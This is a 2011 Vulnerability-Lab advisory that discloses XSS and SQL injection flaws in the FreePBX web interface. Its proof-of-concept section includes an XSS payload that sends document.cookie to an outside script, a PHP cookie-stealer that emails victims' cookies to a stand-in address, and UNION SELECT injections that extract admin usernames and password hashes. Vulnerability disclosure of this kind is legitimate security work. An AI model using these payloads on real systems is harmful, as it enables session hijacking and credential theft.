Document Title:
===============
Free PBX Phone System v2.x v3.x  - Multiple Vulnerabilities


Date:
=====
2011-08-08



VL-ID:
=====
79


Introduction:
=============
Its Hard
to Beat Free
FreePBX is for both developers and people searching for a Business Phone System (or a really fancy home one). 
The new to FreePBX, AsteriskÆ or FreeSWITCH by PBX. FreePBX is an easy to use GUI (graphical user interface) 
that controls and manages Asterisk, the worlds most popular open source telephony engine software. FreePBX 
has been developed and hardened by thousands of volunteers over tens of thousands man hours. FreePBX has been 
downloaded over 5,000,000 times and estimates over 500,000 active phone systems. If you dont know about FreePBX, 
you are probably paying too much for your phone system. Government in Europe & USA mostly use that Software to 
configure Phone System inside of the offices.

(Copy of the Vendor Homepage: http://www.freepbx.org/)


Abstract:
=========
Vulnerability Lab Team discovered multiple Vulnerabilities on free PBX (Private Branch Exchange) Phone Application.


Report-Timeline:
================
2011-08-08:	Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================

Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
Multiple persistent input validation vulnerabilities are detected on free PBX.
The vulnerability allows an remote attacker or local low privileged user account to implement 
malicious persistent script codes on application-side.

Vulnerable Module(s):

				[+] Add Incoming Route Description  
				[+] ringgroups                     
				[+] music                          


Pictures:
                                  ../ive1-server-side.png



1.2 
Multiple non-persistent input validation vulnerabilities are detected on free PBX.
The vulnerability allows remote attackers to form malicious non-persistent links for
client-side attacks over the application.

Vulnerable Module(s):

				[+] findmefollow                    - [Input Validation Error Vulnerability]
				[+] announcement                    - [Input Validation Error Vulnerability]
				[+] did&rnavsort                    - [Input Validation Error Vulnerability]
				[+] trunks                          - [Input Validation Error Vulnerability]


Pictures:
				../ive1-client-side.png



1.3
2 SQL Injection vulnerabilities are detected on the free PBX phone web application.
A privileged application user can execute SQL statements over two different configuration functions of the phone application.

Vulnerable Module(s):

				[+] music&action= (trunkid)
				[+] miscdests&id


--- SQL Error Logs ---
FATAL ERROR
SELECT id, description, destdial FROM miscdests WHERE id = -1\  [nativecode=1064 ** 
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near   at line 1]SQL - SELECT id, description, destdial FROM miscdests WHERE id = -1 

FATAL ERROR
SELECT `tech` FROM `trunks` WHERE `trunkid` = -1 [nativecode=1064 ** You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right syntax to use near  ;#039  at line 1]SQL -
SELECT `tech` FROM `trunks` WHERE `trunkid` = -1 


Pictures:
			../sql.png
			../sql1.png
			../sql2.png


Proof of Concept:
=================
The vulnerabilities can be exploited by local low privileged user accounts & remote attackers. For demonstration or reproduce ...

Reference 1.1 	Persistent
/admin/admin/config.php?display=ringgroups[Input Validation Error Vulnerability]
/admin/admin/config.php?display=music&action=add[Input Validation Error Vulnerability]
/admin/admin/config.php?display=music&action=addstream[Input Validation Error Vulnerability]

Reference 1.2	Non-Persistent
/admin/admin/config.php?display=findmefollow&extdisplay=[Input Validation Error Vulnerability]
/admin/admin/config.php?display=announcement&type=[Input Validation Error Vulnerability]
/admin/admin/config.php?display=did&rnavsort=description&didfilter=[Input Validation Error Vulnerability]
/admin/admin/config.php?display=trunks&tech=[Input Validation Error Vulnerability]


1.1 - 1.2 
location.href='config.php?display=findmefollow&extdisplay=%3C/script%3E%20%22%3E
%3Cscript%20src%3Dhttp%3A//global-evolution.info/grep.php%3E%3C/script%3E?nice='+escape(document.cookie)

<?
$cookie = $_GET['nice'];
$ip = getenv("REMOTE_ADDR");
$Time = date("l dS of F Y h:i:s A"); 
$msg = "Cookie: $cookie\nIP Address: $ip\Time: $Time";
$subject = "cookie";
mail("tester@bad-server.com", $subject, $msg);
header ("location: http://www.freepbx.org/");
?>


1.3
/admin/config.php?display=trunks&extdisplay=OUT_-1'[SQL-Vulnerability]
/admin/config.php?display=miscdests&id=-1'[SQL-Vulnerability]

Reference:
config.php?display=miscdests&id=1%20UNION%20ALL%20SELECT%201,concat(username,0x3a,password_sha1),3%20from%20asterisk.ampusers--
config.php?type=setup&display=miscdests&id=1%20UNION%20ALL%20SELECT%201,concat(username,0x3a,password_sha1),3%20from%20asterisk.ampusers--


Risk:
=====
1.1
The security risk of the persistent vulnerabilities are estimated as medium.

1.2
The security risk of the non-persistent & client-side vulnerabilities are estimated as low.

1.3
The security risk of the sql injection vulnerabilities are estimated as high.



Credits:
========
Rem0ve and tswr


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory